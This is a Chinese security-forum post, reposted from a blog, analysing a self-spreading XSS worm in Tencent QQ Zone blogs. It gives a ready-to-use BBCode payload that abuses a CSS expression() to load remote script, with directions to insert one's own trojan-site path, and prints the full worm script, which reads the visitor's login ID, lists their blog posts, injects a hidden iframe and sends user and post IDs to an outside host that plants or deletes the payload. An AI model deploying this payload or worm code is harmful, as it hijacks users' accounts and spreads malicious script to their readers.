- 帖子
- 154
- 积分
- 616
- 威望
- 754
- 金钱
- 898
- 在线时间
- 81 小时
|
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:风雪残士 http://blog.tkbbs.com
本文首发本人BLOG: http://blog.tkbbs.com/article/48.htm
如果转载请注明作者与出处 谢谢
前几天出现访问空间弹出广告 开始没怎么注意 后来经一位朋友说 看我一篇日志经常出现广告。 加上自己的经历。
tkbbs_20090425173957_fxcs.jpg (146.08 KB)
看了下源代码 发现有个共同处 一律有 http://catche.qq.com/temp/20081209/4236888.swf 这个FLASH地址(访问不了) 而重要的在后面那段标记蓝色代码 经过简单的unicode加密 解码后为
程序代码
this.parentNode.style.display='none';if(!window.xxr){var l=document.createElement('script');l.src='http://love.avtupian.com/a/q/mq.jpg';l.type='text/javascript';document.getElementsByTagName('head').item(0).appendChild(l);window.xxr=1}
就是不知道到底是腾讯的问题 还是病毒自动提交的跨站代码 而腾讯空间有跨站漏洞是毋庸置疑的。
把http: //love.avtupian.com/a/q/mq.jpg下载过来用记事本打开 就可以发现恶意代码
空间日志特征是一个大小都为0的 FLASH 地址为 http://catche.qq.com/temp/20081209/4236888.swf
只要重新编辑下 删掉FLASH 即可(不是转帖复制 手动打上去的文章也有此情况)
又访问了几位好友空间 以前发布的日志没这种情况 基本发生在最近3-4天前发布的日志 病毒代码不是每人都有
个人水平有限 无法确定究竟是腾讯空间出的问题还是病毒造成。 大量网民感染木马自动提交的一段代码
以下代码仅供测试 切勿用作非法用途
复制内容到剪贴板
代码:
[flash,0,0]http://随意地址/fxcs.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//木马网站地址/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
开头的FLASH 随便填 木马网站地址/a/q/mq.jpg 修正为木马路径。
搜索引擎查询
http://www.baidu.com/s?tn=index8 ... Aqq.com+4236888.swf
http://www.baidu.com/s?tn=360se_ ... 236888.swf&ct=0
http://www.google.cn/search?hl=z ... a=&aq=f&oq=
由于查找不了源文件 搜索结果小的可怜 无法扩大搜索
这个漏洞应该有人早发现了 而且制作了程序实现编辑日志自动带一个 这么尾巴 由于FLASH大小为0 不注意就不会发现
mq.jpg 代码 (连接框架地址部分我修改了下 其他没变 现在网站访问不了 不知道原版是啥。。)
复制内容到剪贴板
代码:
function killErrors() {return true;}
window.onerror=killErrors;
var shendu;shendu=4;
//---------------global---v------------------------------------------
var visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();
var gurl=document.location.href;
var gurle=gurl.indexOf("com/");
gurl=gurl.substring(0,gurle+3);
var visitorID=top.document.documentElement.outerHTML;
var cookieS=visitorID.indexOf("g_iLoginUin = ");
visitorID=visitorID.substring(cookieS+14);
cookieS=visitorID.indexOf(",");
visitorID=visitorID.substring(0,cookieS);
get_my_blog(visitorID);
DOshuamy();
function DOshuamy(){
var ssr=document.getElementById("veryTitle");
ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.tkbbs.com/1.html'></iframe>");
}
//-----------------------------------------
function get_my_blog(visitorID){
userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";
xhr=createXMLHttpRequest();
if(xhr){
xhr.open("GET",userurl,false);
xhr.send();guest=xhr.responseText;
get_my_blogurl(guest);
}
}
function get_my_blogurl(guest){
var mybloglist=guest;
var myurls;var blogids;var blogide;
for(i=0;i<shendu;i++){
myurls=mybloglist.indexOf('selectBlog(');
if(myurls!=-1){
mybloglist=mybloglist.substring(myurls+11);
myurls=mybloglist.indexOf(')');
myblogid=mybloglist.substring(0,myurls);
}else{break;}
}
get_my_testself();
}
function get_my_testself(){
for(i=0;i<myblogid.length;i++){
var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid+"&r="+Math.random();
var xhr2=createXMLHttpRequest();
if(xhr2){
xhr2.open("GET",url,false);
xhr2.send();
guest2=xhr2.responseText;
var mycheckit=guest2.indexOf("baidu");
var mycheckmydoit=guest2.indexOf("mydoit");
if(mycheckmydoit!="-1"){
targetblogurlid=myblogid;
add_jsdel(visitorID,targetblogurlid,gurl);
break;
}
if(mycheckit=="-1"){
targetblogurlid=myblogid;
add_js(visitorID,targetblogurlid,gurl);
break;
}
}
}
}
//--------------------------------------
function createXMLHttpRequest(){
var XMLhttpObject=null;
if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}
else
{ var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
for(var i=0;i<MSXML.length;i++)
{
try
{
XMLhttpObject=new ActiveXObject(MSXML);
break;
}
catch (ex) {
}
}
}
return XMLhttpObject;
}
function add_js(visitorID,targetblogurlid,gurl){
var s2=document.createElement('script');
s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();
s2.type='text/javascript';
document.getElementsByTagName('head').item(0).appendChild(s2);
}
function add_jsdel(visitorID,targetblogurlid,gurl){
var s2=document.createElement('script');
s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();
s2.type='text/javascript';
document.getElementsByTagName('head').item(0).appendChild(s2);
} |
|